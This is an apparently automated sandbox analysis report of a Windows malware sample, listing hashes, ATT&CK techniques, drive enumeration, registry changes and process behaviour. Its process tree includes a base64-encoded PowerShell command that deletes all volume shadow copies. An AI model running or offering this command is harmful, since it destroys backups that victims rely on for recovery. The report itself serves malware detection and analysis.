db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b

General

Target

db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
Size

164KB
MD5

9a2888ddc389ecde165446d6e3c27f80
SHA1

bf77c02c5a58b5efb29db4191f7e38853dcc3c90
SHA256

db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b
SHA512

9473b40f0b50d3960395e59ca23b8809cb982185f684989d1641c9193c8d2325d2d0843e66421bfdedac26e850bb3d4a9abae06741f7dfb11cf402abcfbdf3b7

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

description	ioc	process
File opened (read-only)	\??\H:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\M:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\P:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\X:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\Z:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\F:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\K:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\Q:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\W:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\G:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\L:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\R:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\S:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\T:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\E:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\B:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\I:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\J:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\N:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\O:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\U:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\V:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\A:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened (read-only)	\??\Y:	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

Drops file in Windows directory 64 IoCs

Processes:

db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

description	ioc	process
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..i_initiator_service_31bf3856ad364e35_10.0.15063.0_none_eb8784774de6a9ad_iscsitarget.cdxml_1fec77bc	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-w..cture-bsp.resources_31bf3856ad364e35_10.0.15063.0_es-es_e9151cf4d10c2bb5.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-i..r_service.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_967b0826e973a912.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-appid.resources_31bf3856ad364e35_10.0.15063.0_de-de_9e4d8c43f6cb726c.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wbiosrvc.resources_31bf3856ad364e35_10.0.15063.0_en-us_fca37a8068e89c2a_wbiosrvc.dll.mui_d5b8b2b8	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft.windows.winhttp.resources_31bf3856ad364e35_6.0.15063.0_en-us_6dffadf883c9e255.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_networking-mpssvc-svc.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_45540aa0eea0af0a_mpssvc.dll.mui_4b194b5f	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-commonlog.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_523cdc9af095f546.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-h..p-listsvc.resources_31bf3856ad364e35_10.0.15063.0_de-de_c8d121395a04e07d.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_8706117e54d521c4_msimsg.dll.mui_72e8994f	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-security-spp_31bf3856ad364e35_10.0.15063.0_none_2b7530b159c1ac4e.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-smartcardsubsystem_31bf3856ad364e35_10.0.15063.0_none_291118dda2c1a1ca_certprop.dll_0b11a6d7	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-tcpip.resources_31bf3856ad364e35_10.0.15063.0_de-de_d846e1155eb73b0a_tcpipcfg.dll.mui_a5479fc1	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-n..-domain-clients-svc_31bf3856ad364e35_10.0.15063.0_none_5f76fb5d5934b9cf_fwremotesvr.dll_afaa5ea8	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_326ea0f914b4afde_bootmgr.efi.mui_be5d0075	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_hu-hu_79df2140f9147efa.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..r_service.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_664c2e56d78422ef.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_10.0.15063.0_de-de_d2204a576fe5db64_services.exe.mui_86ea5e71	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-u..n-cmdline.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_83341399f9512935.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-volsnap_31bf3856ad364e35_10.0.15063.0_none_703dcec1da3ef92f.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-shcore_31bf3856ad364e35_10.0.15063.0_none_e1dc608f8e651b89_shcore.dll_c9cc19cc	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-dui70_31bf3856ad364e35_10.0.15063.0_none_0ca9ed867e8c0f29.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-h..p-listsvc.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_a0923f690628eba2.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-sens-service_31bf3856ad364e35_10.0.15063.0_none_cccd063af7c61d71.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..eservices.resources_31bf3856ad364e35_10.0.15063.0_en-us_ea6b6d97f2f4c7b4_wiarpc.dll.mui_0c913b87	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-win32kbase_31bf3856ad364e35_10.0.15063.0_none_bf8a1f019f8c15f7.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_3dfe9dfd48e10842_scarddlg.dll.mui_300ae9df	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-shcore_31bf3856ad364e35_10.0.15063.0_none_e1dc608f8e651b89.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-i..r_service.resources_31bf3856ad364e35_10.0.15063.0_en-us_67aabff02c2da9b2_iscsidsc.dll.mui_6acb64a6	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-eventlog.resources_31bf3856ad364e35_10.0.15063.0_de-de_0629d2d30abfb1b8.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-oem_31bf3856ad364e35_10.0.15063.0_none_0e77f624e73557a1_vga950.fon_09ed4d3d	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.15063.0_it-it_e657614a3ec4b658.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.15063.0_hr-hr_0f58c5ace4a78141_comctl32.dll.mui_0da4e682	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-i..i_initiator_service_31bf3856ad364e35_10.0.15063.0_none_f5dc2ec982476ba8_iscsitarget.cdxml_1fec77bc	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-t..services-publicapis_31bf3856ad364e35_10.0.15063.0_none_d844c496ff23f583_wtsapi32.dll_470d4d41	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-n..-domain-clients-svc_31bf3856ad364e35_10.0.15063.0_none_5f76fb5d5934b9cf_ipsecsvc.mof_713662d2	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_10.0.15063.0_de-de_c5f11561ed21f5cb_axinstsv.dll.mui_be092a2d	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_10.0.15063.0_el-gr_8f9125b021f304a0.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_10.0.15063.0_none_946aa6202fade3c5_vgasyst.fon_aefdfa30	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_ko-kr_2a6fee334745e8da.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..i_initiator_service_31bf3856ad364e35_10.0.15063.0_none_eb8784774de6a9ad_iscsicli.exe_20e14d4f	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-security-ngc-kspsvc_31bf3856ad364e35_10.0.15063.0_none_790e90d47316785c.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-oleacc_31bf3856ad364e35_10.0.15063.0_none_85ed41598f9336e6_oleacc.dll_2f3fa5bf	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_10.0.15063.0_ru-ru_1d981f25f7673e6e_bootmgr.exe.mui_c434701f	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft.windows.isolationautomation_6595b64144ccf1df_1.0.15063.0_none_58a3b1f2dbb10121.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..structure.resources_31bf3856ad364e35_10.0.15063.0_de-de_604b4be6e091800f_apphelp.dll.mui_59096153	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..structure.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_380c6a168cb58b34_sdbinst.exe.mui_258ad624	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.15063.0_nb-no_82c9d6ba4bb6c1ef.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_el-gr_57db20e197c67f2d.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-msasn1_31bf3856ad364e35_10.0.15063.0_none_e2c299561290de8e.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-s..-netlogon.resources_31bf3856ad364e35_10.0.15063.0_es-es_4af765598c2696d8_netlogon.dll.mui_ecbeb9bd	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.15063.0_pl-pl_58f4e400e2c4328e.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\wow64_microsoft-windows-h..p-provsvc.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_bdb27eaa4454a9b8.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_10.0.15063.0_none_946aa6202fade3c5_vgas1256.fon_a23e6fc8	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.15063.0_pt-br_59d1ffcc04432003.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-rasautodial_31bf3856ad364e35_10.0.15063.0_none_20edd7ef9e21d8cb_rasautou.exe_477abe34	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_10.0.15063.0_es-es_7adc7d345eead8ce.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-sechost_31bf3856ad364e35_10.0.15063.0_none_98d6b61705c4f027_sechost.dll_a7bf8aa9	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.15063.0_es-mx_5baee2aa73549e23.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.15063.0_ko-kr_7393f3e338ccb84f_comctl32.dll.mui_0da4e682	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.15063.0_fr-fr_f5e67079153cbce7.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..-usermode.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_06c8a8054dc02d3d_wudfplatform.dll.mui_d815d31a	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..r_service.resources_31bf3856ad364e35_10.0.15063.0_de-de_1ad8857af5ad0f23_iscsidsc.dll.mui_6acb64a6	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
File opened for modification	C:\Windows\WinSxS\Backup\amd64_microsoft-windows-u..erservice.resources_31bf3856ad364e35_10.0.15063.0_ja-jp_30ab982187e93619.manifest	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

Modifies data under HKEY_USERS 42 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exepowershell.exe

pid	process
3348	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
3348	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
3348	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
3348	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
380	powershell.exe
380	powershell.exe
380	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	380	powershell.exe
Token: SeBackupPrivilege	1364	vssvc.exe
Token: SeRestorePrivilege	1364	vssvc.exe
Token: SeAuditPrivilege	1364	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe

description	pid	process	target process
PID 3348 wrote to memory of 380	3348	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe	powershell.exe
PID 3348 wrote to memory of 380	3348	db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe
"C:\Users\Admin\AppData\Local\Temp\db725306e6d15f5f339c2b5dc9c2daf7e11957e93e8cc9c71319c0a432e6358b.exe"
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:380

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1536

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1364

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/380-127-0x000001DCF7F50000-0x000001DCF7F72000-memory.dmp

Filesize
136KB

Download
